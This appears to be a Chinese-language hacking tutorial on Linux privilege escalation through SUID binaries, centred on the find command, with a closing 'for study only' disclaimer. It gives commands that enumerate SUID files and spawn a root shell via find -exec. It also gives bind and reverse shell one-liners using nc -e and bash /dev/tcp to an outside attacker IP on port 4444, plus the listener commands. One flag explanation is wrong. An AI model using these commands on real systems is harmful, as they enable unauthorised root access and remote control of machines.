find 命令用于在指定目录下查找文件和目录。
提权利用
收集具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;- /表示从文件系统的顶部(根)开始并找到每个目录
- perm 表示搜索随后的权限
- u = s表示查找root用户拥有的文件
- type表示我们正在寻找的文件类型
- f 表示常规文件,而不是目录或特殊文件
- 2表示该进程的第二个文件描述符,即stderr(标准错误)
- /dev/null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
如下命令均具有s权限
find提权
find需要指向一个文本文件,就以/etc/passwd为例
find /etc/passwd -exec whoami \;
root进入shell
find /etc/passwd -exec '/bin/sh' \;
sh-5.0# whoami
rootlinux一般都安装了nc 我们也可以利用nc广播或者反弹shell: 广播shell(正向连接)
find user -exec nc -lvp 4444 -e '/bin/sh' \;
在攻击机上
nc 靶机ip 4444反弹shell(反向连接)
find /etc/passwd -exec nc -e /bin/bash x.x.x.x port \;
find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/114.xxx.xxx.96/4444 0>&1' \;
在攻击机上:
nc -lnvp 4444sudo find . -exec /bin/sh \; -quit
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
